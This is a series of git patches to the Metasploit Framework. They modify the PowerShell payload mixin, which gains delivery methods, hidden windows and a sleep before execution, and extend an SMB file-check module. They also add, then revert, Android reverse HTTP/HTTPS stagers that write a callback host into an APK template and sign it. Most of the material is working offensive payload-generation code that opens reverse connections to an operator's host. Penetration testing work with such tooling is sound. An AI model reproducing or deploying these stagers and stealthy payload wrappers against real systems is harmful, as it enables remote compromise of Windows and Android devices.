+                   :<=, :to_c, :slice!, :chomp!, :next!, :downcase, :unpack, :crypt, :partition,
+                   :between?, :squeeze!, :to_s, :chomp, :bytes, :clear, :!~, :to_i, :valid_encoding?, :===,
+                   :tr, :downcase!, :scan, :sub!, :each_codepoint, :reverse!, :class, :size, :empty?, :byteslice,
+                   :initialize_clone, :to_str, :to_enum,:tap, :tr!, :trust, :encode!, :sub, :oct, :succ, :index,
+                   :[]=, :encode, :*, :hex, :to_f, :strip!, :rpartition, :ord, :capitalize, :upto, :force_encoding,
+                   :end_with?
 
     # def method_missing(meth, *args, &block)
     #   code.send(meth,*args,&block) || (raise NoMethodError.new, meth)
@@ -379,12 +450,11 @@ module Powershell
     ##
 
     #
-    # Convert binary to byte array, read from file if able
+    # Build a byte array to load into powershell code
     #
-    def self.to_byte_array(input_data,var_name="buf")
-      return "[Byte[]]$#{name} = ''" if input_data.nil? or input_data.empty?
-
-      code = input_data.unpack('C*')
+    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []
       1.upto(code.length-1) do |byte|
@@ -394,16 +464,7 @@ module Powershell
           lines.push ",0x#{code[byte].to_s(16)}"
         end
       end
-
-      return psh << lines.join("") + "\r\n"
-    end
-
-    #
-    # Build a byte array to load into powershell code
-    #
-    def self.build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-      return to_byte_array(input_data,var_name)
+      psh << lines.join("") + "\r\n"
     end
 
     def self.psp_funcs(dir)
@@ -423,3 +484,4 @@ module Powershell
 end
 end
 end
+

From 0056c260470815eeb2c629d506940fb49b7ef626 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Wed, 12 Feb 2014 22:06:18 -0500
Subject: [PATCH 057/321] import msf exploit

---
 lib/msf/core/exploit/powershell.rb | 75 +++++++++++++++++++++---------
 1 file changed, 53 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index e918e7fd4b..42ce1559ae 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -12,11 +12,17 @@ module Exploit::Powershell
     register_advanced_options(
       [
         OptBool.new('PSH::persist', [true, 'Run the payload in a loop', false]),
-        OptBool.new('PSH::old_technique', [true, 'Use powershell 1.0', false]),
+        OptBool.new('PSH::prepend_sleep'), [false, 'Prepend seconds of sleep']),
         OptBool.new('PSH::strip_comments', [false, 'Strip comments', true]),
         OptBool.new('PSH::strip_whitespace', [false, 'Strip whitespace', false]),
         OptBool.new('PSH::sub_vars', [false, 'Substitute variable names', false]),
         OptBool.new('PSH::sub_funcs', [false, 'Substitute function names', false]),
+        OptEnum.new('PSH::method', [true, 'Payload delivery method', 'reflection', [
+          'net',
+          'reflection',
+          'old',
+          'msil'
+        ]]),
       ], self.class)
   end
 
@@ -144,7 +150,7 @@ module Exploit::Powershell
     end
 
     # Shorten args if PSH 2.0+
-    unless datastore['PSH::old_technique']
+    unless datastore['PSH::method'] == 'old'
       arg_string.gsub!(' -Command ', ' -c ')
       arg_string.gsub!(' -EncodedCommand ', ' -e ')
       arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
@@ -178,7 +184,7 @@ module Exploit::Powershell
     end
 
     # Old technique fails if powershell exits..
-    arg_opts[:noexit] = true if datastore['PSH::old_technique']
+    arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
 
     ps_args = generate_psh_args(arg_opts)
 
@@ -193,6 +199,9 @@ $s=New-Object System.Diagnostics.ProcessStartInfo
 $s.FileName=$b
 $s.Arguments='#{ps_args}'
 $s.UseShellExecute=$false
+$si.RedirectStandardOutput = $true
+$si.WindowStyle = 'Hidden'
+$si.CreateNoWindow = $True
 $p=[System.Diagnostics.Process]::Start($s)
 EOS
     process_start_info.gsub!("\n",';')
@@ -231,6 +240,17 @@ EOS
       psh_payload = Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
     end
 
+    psh_payload = case datastore['PSH::method']
+    when 'net'
+      Msf::Util::EXE.to_win32pe_psh_net(framework, pay)
+    when 'reflection'
+      Msf::Util::EXE.to_win32pe_psh_reflection(framework, pay)
+    when 'old'
+      Msf::Util::EXE.to_win32pe_psh(framework, pay)
+    when 'msil'
+      raise "Not in framework anymore"
+    end
+
     # Run our payload in a while loop
     if datastore['PSH::persist']
       fun_name = Rex::Text.rand_text_alpha(rand(2)+2)
@@ -239,6 +259,13 @@ EOS
       psh_payload  = "function #{fun_name}{#{psh_payload}};"
       psh_payload << "while(1){Start-Sleep -s #{sleep_time};#{fun_name};1};"
     end
+    if datastore['PSH::prepend_sleep']
+      if datastore['PSH::prepend_sleep'].to_i > 0
+        psh_payload = "Start-Sleep -s #{datastore['PSH::prepend_sleep']};" << psh_payload
+      else
+        vprint_error('Sleep time must be greater than 0 seconds')
+      end
+    end
 
     compressed_payload = compress_script(psh_payload)
     encoded_payload = encode_script(psh_payload)
@@ -297,7 +324,7 @@ EOS
     if opts[:remove_comspec]
       command = psh_command
     else
-      command = "%COMSPEC% /b /c #{psh_command}"
+      command = "%COMSPEC% /b /c start /min #{psh_command}"
     end
 
     vprint_status("Powershell command length: #{command.length}")
@@ -337,23 +364,24 @@ EOS
       return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
     end
 
-	#
-	# Convert binary to byte array, read from file if able
-	#
-	def build_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-		code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
-		code = code.unpack('C*')
-		psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
-		lines = []
-		1.upto(code.length-1) do |byte|
-			if(byte % 10 == 0)
-				lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
-			else
-				lines.push ",0x#{code[byte].to_s(16)}"
-			end
-		end
-		psh << lines.join("") + "\r\n"
-	end
+    #
+    # Convert binary to byte array, read from file if able
+    #
+    def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
+      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      code = code.unpack('C*')
+      psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
+      lines = []
+      1.upto(code.length-1) do |byte|
+        if(byte % 10 == 0)
+          lines.push "\r\n$#{var_name} += 0x#{code[byte].to_s(16)}"
+        else
+          lines.push ",0x#{code[byte].to_s(16)}"
+        end
+      end
+
+      return psh << lines.join("") + "\r\n"
+    end
 
     #
     # Find PID of file locker
@@ -362,10 +390,13 @@ EOS
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
 
-
+    #
+    # Return last time of login for each user
+    #
     def self.get_last_login(user)
       return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
+
   end
 end
 end

From 4b247e2b9fa229156483fec21214857ba9549e91 Mon Sep 17 00:00:00 2001
From: j0hnf <jf@tinternet.org.uk>
Date: Sun, 16 Feb 2014 03:22:11 +0000
Subject: [PATCH 058/321] altered check_dir_file.rb so that it can check for
 the presence of a list of files/directories supplied using file:/ format
 rather than being limited to just the one file, handy for checking for
 indicators of compromise

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 65 +++++++++++--------
 1 file changed, 37 insertions(+), 28 deletions(-)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index 8e6199dd41..d377337aa3 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -33,6 +33,7 @@ class Metasploit3 < Msf::Auxiliary
       'Author'      =>
         [
           'patrick',
+	  'j0hn__f'
         ],
       'References'  =>
         [
@@ -42,7 +43,10 @@ class Metasploit3 < Msf::Auxiliary
 
     register_options([
       OptString.new('SMBSHARE', [true, 'The name of an accessible share on the server', 'C$']),
-      OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share'])
+      OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share']),
+      OptString.new('SMBUser', [false, 'Username to connect with']),
+      OptString.new('SMBPass', [false, 'Password to use']),
+      OptString.new('SMBDomain', [false, 'Domain'])
     ], self.class)
 
   end
@@ -51,7 +55,6 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("Connecting to the server...")
 
-    begin
     connect()
     smb_login()
 
@@ -60,31 +63,37 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("Checking for file/folder #{datastore['RPATH']}...")
 
-    if (fd = simple.open("\\#{datastore['RPATH']}", 'o')) # mode is open only - do not create/append/write etc
-      print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
-      fd.close
-    end
-    rescue ::Rex::HostUnreachable
-      vprint_error("Host #{rhost} offline.")
-    rescue ::Rex::Proto::SMB::Exceptions::LoginError
-      vprint_error("Host #{rhost} login error.")
-    rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
-      if e.get_error(e.error_code) == "STATUS_FILE_IS_A_DIRECTORY"
-        print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']}")
-      elsif e.get_error(e.error_code) == "STATUS_OBJECT_NAME_NOT_FOUND"
-        vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']} NOT found!")
-      elsif e.get_error(e.error_code) == "STATUS_OBJECT_PATH_NOT_FOUND"
-        vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['RPATH']} NOT found!")
-      elsif e.get_error(e.error_code) == "STATUS_ACCESS_DENIED"
-        vprint_error("Host #{rhost} reports access denied.")
-      elsif e.get_error(e.error_code) == "STATUS_BAD_NETWORK_NAME"
-        vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
-      elsif e.get_error(e.error_code) == "STATUS_INSUFF_SERVER_RESOURCES"
-        vprint_error("Host #{rhost} rejected with insufficient resources!")
-      else
-        raise e
-      end
-    end
-  end
+    datastore['RPATH'].each_line do |path|
+      begin
 
+      if (fd = simple.open("\\#{path.chomp}", 'o')) # mode is open only - do not create/append/write etc
+        print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+        fd.close
+      end
+
+      rescue ::Rex::HostUnreachable
+        vprint_error("Host #{rhost} offline.")
+      rescue ::Rex::Proto::SMB::Exceptions::LoginError
+        vprint_error("Host #{rhost} login error.")
+      rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+        if e.get_error(e.error_code) == "STATUS_FILE_IS_A_DIRECTORY"
+          print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+        elsif e.get_error(e.error_code) == "STATUS_OBJECT_NAME_NOT_FOUND"
+          vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+        elsif e.get_error(e.error_code) == "STATUS_OBJECT_PATH_NOT_FOUND"
+          vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+        elsif e.get_error(e.error_code) == "STATUS_ACCESS_DENIED"
+          vprint_error("Host #{rhost} reports access denied.")
+        elsif e.get_error(e.error_code) == "STATUS_BAD_NETWORK_NAME"
+          vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
+        elsif e.get_error(e.error_code) == "STATUS_INSUFF_SERVER_RESOURCES"
+          vprint_error("Host #{rhost} rejected with insufficient resources!")
+        elsif e.get_error(e.error_code) == "STATUS_OBJECT_NAME_INVALID"
+          vprint_error("opeining \\#{path} bad filename")
+        else
+          raise e
+        end
+      end # end do
+    end # end begin
+  end # end def
 end

From c62fa83a704bdab8654763c7dcd0be60438b417c Mon Sep 17 00:00:00 2001
From: j0hnf <jf@tinternet.org.uk>
Date: Wed, 19 Feb 2014 22:20:24 +0000
Subject: [PATCH 059/321] msf recommended changes + tweaked exception handling

---
 modules/auxiliary/admin/smb/check_dir_file.rb | 74 ++++++++++---------
 1 file changed, 39 insertions(+), 35 deletions(-)

diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb
index d377337aa3..78840796e7 100644
--- a/modules/auxiliary/admin/smb/check_dir_file.rb
+++ b/modules/auxiliary/admin/smb/check_dir_file.rb
@@ -11,6 +11,7 @@ class Metasploit3 < Msf::Auxiliary
 
   # Exploit mixins should be called first
   include Msf::Exploit::Remote::SMB
+  include Msf::Exploit::Remote::SMB::Authenticated
   include Msf::Auxiliary::Scanner
   include Msf::Auxiliary::Report
 
@@ -42,11 +43,7 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     register_options([
-      OptString.new('SMBSHARE', [true, 'The name of an accessible share on the server', 'C$']),
       OptString.new('RPATH', [true, 'The name of the remote file/directory relative to the share']),
-      OptString.new('SMBUser', [false, 'Username to connect with']),
-      OptString.new('SMBPass', [false, 'Password to use']),
-      OptString.new('SMBDomain', [false, 'Domain'])
     ], self.class)
 
   end
@@ -55,45 +52,52 @@ class Metasploit3 < Msf::Auxiliary
 
     vprint_status("Connecting to the server...")
 
-    connect()
-    smb_login()
+    begin
+      connect()
+      smb_login()
 
-    vprint_status("Mounting the remote share \\\\#{datastore['RHOST']}\\#{datastore['SMBSHARE']}'...")
-    self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
+      vprint_status("Mounting the remote share \\\\#{datastore['RHOST']}\\#{datastore['SMBSHARE']}'...")
+      self.simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}")
+      vprint_status("Checking for file/folder #{datastore['RPATH']}...")
 
-    vprint_status("Checking for file/folder #{datastore['RPATH']}...")
+      datastore['RPATH'].each_line do |path|
 
-    datastore['RPATH'].each_line do |path|
-      begin
+        begin
+  
+          if (fd = simple.open("\\#{path.chomp}", 'o')) # mode is open only - do not create/append/write etc
+            print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+            fd.close
+          end
 
-      if (fd = simple.open("\\#{path.chomp}", 'o')) # mode is open only - do not create/append/write etc
-        print_good("File FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
-        fd.close
-      end
+        rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
+          case e.get_error(e.error_code)
+          when "STATUS_FILE_IS_A_DIRECTORY"
+            print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
+          when "STATUS_OBJECT_NAME_NOT_FOUND"
+            vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+          when "STATUS_OBJECT_PATH_NOT_FOUND"
+            vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
+          when "STATUS_ACCESS_DENIED"
+            vprint_error("Host #{rhost} reports access denied.")
+          when "STATUS_BAD_NETWORK_NAME"
+            vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
+          when "STATUS_INSUFF_SERVER_RESOURCES"
+            vprint_error("Host #{rhost} rejected with insufficient resources!")
+          when "STATUS_OBJECT_NAME_INVALID"
+            vprint_error("opeining \\#{path} bad filename")
+          else
+            raise e
+          end
+        end
+      end #end do
 
       rescue ::Rex::HostUnreachable
         vprint_error("Host #{rhost} offline.")
       rescue ::Rex::Proto::SMB::Exceptions::LoginError
-        vprint_error("Host #{rhost} login error.")
-      rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
-        if e.get_error(e.error_code) == "STATUS_FILE_IS_A_DIRECTORY"
-          print_good("Directory FOUND: \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path}")
-        elsif e.get_error(e.error_code) == "STATUS_OBJECT_NAME_NOT_FOUND"
-          vprint_error("Object \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
-        elsif e.get_error(e.error_code) == "STATUS_OBJECT_PATH_NOT_FOUND"
-          vprint_error("Object PATH \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{path} NOT found!")
-        elsif e.get_error(e.error_code) == "STATUS_ACCESS_DENIED"
-          vprint_error("Host #{rhost} reports access denied.")
-        elsif e.get_error(e.error_code) == "STATUS_BAD_NETWORK_NAME"
-          vprint_error("Host #{rhost} is NOT connected to #{datastore['SMBDomain']}!")
-        elsif e.get_error(e.error_code) == "STATUS_INSUFF_SERVER_RESOURCES"
-          vprint_error("Host #{rhost} rejected with insufficient resources!")
-        elsif e.get_error(e.error_code) == "STATUS_OBJECT_NAME_INVALID"
-          vprint_error("opeining \\#{path} bad filename")
-        else
-          raise e
-        end
-      end # end do
+        print_error("Host #{rhost} login error.")
+      rescue ::Rex::ConnectionRefused 
+        print_error "Host #{rhost} unable to connect - connection refused" 
+
     end # end begin
   end # end def
 end

From 65ada24d9e9caf2a3a39a4bd2d4d6390cded19c5 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Wed, 26 Feb 2014 01:44:09 +0200
Subject: [PATCH 060/321] android reverse_http/s

---
 .../payloads/stagers/android/reverse_http.rb  | 88 +++++++++++++++++
 .../payloads/stagers/android/reverse_https.rb | 94 +++++++++++++++++++
 .../payloads/stagers/android/reverse_tcp.rb   |  6 ++
 3 files changed, 188 insertions(+)
 create mode 100644 modules/payloads/stagers/android/reverse_http.rb
 create mode 100644 modules/payloads/stagers/android/reverse_https.rb

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
new file mode 100644
index 0000000000..182acd498d
--- /dev/null
+++ b/modules/payloads/stagers/android/reverse_http.rb
@@ -0,0 +1,88 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_http'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTP Stager',
+      'Description'   => 'Tunnel communication over HTTP',
+      'Author'        => 'anwarelmakrahy',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttp,
+      'Stager'        => {'Payload' => ""}
+      ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+  end 
+  
+  def string_sub(data, placeholder, input)
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+  
+  def generate_jar(opts={})
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST']
+    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "res", "drawable-mdpi", "icon.png" ],
+      [ "res", "layout", "main.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+      )
+    key  = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+
+end
\ No newline at end of file
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
new file mode 100644
index 0000000000..cab35f9380
--- /dev/null
+++ b/modules/payloads/stagers/android/reverse_https.rb
@@ -0,0 +1,94 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+#
+
+require 'msf/core'
+require 'msf/core/handler/reverse_https'
+
+module Metasploit3
+
+  include Msf::Payload::Stager
+  include Msf::Payload::Dalvik
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Dalvik Reverse HTTPS Stager',
+      'Description'   => 'Tunnel communication over HTTPS',
+      'Author'        => 'anwarelmakrahy', 
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'android',
+      'Arch'          => ARCH_DALVIK,
+      'Handler'       => Msf::Handler::ReverseHttps,
+      'Stager'        => {'Payload' => ""}
+      ))
+    
+  		@class_files = [
+      [ "metasploit", "PayloadTrustManager.class" ],
+    ]
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
+
+  end
+  
+  def string_sub(data, placeholder, input)
+    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+  end
+  
+  def generate_jar(opts={})
+    jar = Rex::Zip::Jar.new
+
+    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+
+    string_sub(classes, 'ZZZZ                                ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST']
+    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
+    jar.add_file("classes.dex", fix_dex_header(classes))
+
+    files = [
+      [ "AndroidManifest.xml" ],
+      [ "res", "drawable-mdpi", "icon.png" ],
+      [ "res", "layout", "main.xml" ],
+      [ "resources.arsc" ]
+    ]
+
+    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+    jar.build_manifest
+
+    x509_name = OpenSSL::X509::Name.parse(
+      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+      )
+    key  = OpenSSL::PKey::RSA.new(1024)
+    cert = OpenSSL::X509::Certificate.new
+    cert.version = 2
+    cert.serial = 1
+    cert.subject = x509_name
+    cert.issuer = x509_name
+    cert.public_key = key.public_key
+
+    # Some time within the last 3 years
+    cert.not_before = Time.now - rand(3600*24*365*3)
+
+    # From http://developer.android.com/tools/publishing/app-signing.html
+    # """
+    # A validity period of more than 25 years is recommended.
+    #
+    # If you plan to publish your application(s) on Google Play, note
+    # that a validity period ending after 22 October 2033 is a
+    # requirement. You can not upload an application if it is signed
+    # with a key whose validity expires before that date.
+    # """
+    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+
+    jar.sign(key, cert, [cert])
+
+    jar
+  end
+ 
+end
diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb
index d41922f40e..005380bad3 100644
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@@ -24,6 +24,11 @@ module Metasploit3
       'Handler'		=> Msf::Handler::ReverseTcp,
       'Stager'		=> {'Payload' => ""}
     ))
+
+    register_options(
+    [
+      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
+    ], self.class)
   end
 
   def string_sub(data, placeholder, input)
@@ -37,6 +42,7 @@ module Metasploit3
 
     string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
     string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
     jar.add_file("classes.dex", fix_dex_header(classes))
 
     files = [

From b14f3cab46201f4be62da9d45e84d26fd03a22e9 Mon Sep 17 00:00:00 2001
From: AnwarMohamed <anwarelmakrahy@gmail.com>
Date: Wed, 26 Feb 2014 04:32:18 +0200
Subject: [PATCH 061/321] Revert "android reverse_http/s"

This reverts commit 65ada24d9e9caf2a3a39a4bd2d4d6390cded19c5.
---
 .../payloads/stagers/android/reverse_http.rb  | 88 -----------------
 .../payloads/stagers/android/reverse_https.rb | 94 -------------------
 .../payloads/stagers/android/reverse_tcp.rb   |  6 --
 3 files changed, 188 deletions(-)
 delete mode 100644 modules/payloads/stagers/android/reverse_http.rb
 delete mode 100644 modules/payloads/stagers/android/reverse_https.rb

diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb
deleted file mode 100644
index 182acd498d..0000000000
--- a/modules/payloads/stagers/android/reverse_http.rb
+++ /dev/null
@@ -1,88 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-
-require 'msf/core'
-require 'msf/core/handler/reverse_http'
-
-module Metasploit3
-
-  include Msf::Payload::Stager
-  include Msf::Payload::Dalvik
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTP Stager',
-      'Description'   => 'Tunnel communication over HTTP',
-      'Author'        => 'anwarelmakrahy',
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttp,
-      'Stager'        => {'Payload' => ""}
-      ))
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
-  end 
-  
-  def string_sub(data, placeholder, input)
-    data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
-  end
-  
-  def generate_jar(opts={})
-    jar = Rex::Zip::Jar.new
-
-    classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
-
-    string_sub(classes, 'ZZZZ                                ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST']
-    string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
-    string_sub(classes, 'TTTT                                ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount']
-    jar.add_file("classes.dex", fix_dex_header(classes))
-
-    files = [
-      [ "AndroidManifest.xml" ],
-      [ "res", "drawable-mdpi", "icon.png" ],
-      [ "res", "layout", "main.xml" ],
-      [ "resources.arsc" ]
-    ]
-
-    jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
-    jar.build_manifest
-
-    x509_name = OpenSSL::X509::Name.parse(
-      "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
-      )
-    key  = OpenSSL::PKey::RSA.new(1024)
-    cert = OpenSSL::X509::Certificate.new
-    cert.version = 2
-    cert.serial = 1
-    cert.subject = x509_name
-    cert.issuer = x509_name
-    cert.public_key = key.public_key
-
-    # Some time within the last 3 years
-    cert.not_before = Time.now - rand(3600*24*365*3)
-
-    # From http://developer.android.com/tools/publishing/app-signing.html
-    # """
-    # A validity period of more than 25 years is recommended.
-    #
-    # If you plan to publish your application(s) on Google Play, note
-    # that a validity period ending after 22 October 2033 is a
-    # requirement. You can not upload an application if it is signed
-    # with a key whose validity expires before that date.
-    # """
-    cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
-
-    jar.sign(key, cert, [cert])
-
-    jar
-  end
-
-end
\ No newline at end of file
diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb
deleted file mode 100644
index cab35f9380..0000000000
--- a/modules/payloads/stagers/android/reverse_https.rb
+++ /dev/null
@@ -1,94 +0,0 @@
-##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
-##
-#
-
-require 'msf/core'
-require 'msf/core/handler/reverse_https'
-
-module Metasploit3
-
-  include Msf::Payload::Stager
-  include Msf::Payload::Dalvik
-
-  def initialize(info = {})
-    super(merge_info(info,
-      'Name'          => 'Dalvik Reverse HTTPS Stager',
-      'Description'   => 'Tunnel communication over HTTPS',
-      'Author'        => 'anwarelmakrahy', 
-      'License'       => MSF_LICENSE,
-      'Platform'      => 'android',
-      'Arch'          => ARCH_DALVIK,
-      'Handler'       => Msf::Handler::ReverseHttps,
-      'Stager'        => {'Payload' => ""}
-      ))
-    
-  		@class_files = [
-      [ "metasploit", "PayloadTrustManager.class" ],
-    ]
-
-    register_options(
-    [
-      OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10])
-    ], self.class)
-
-  end
-  
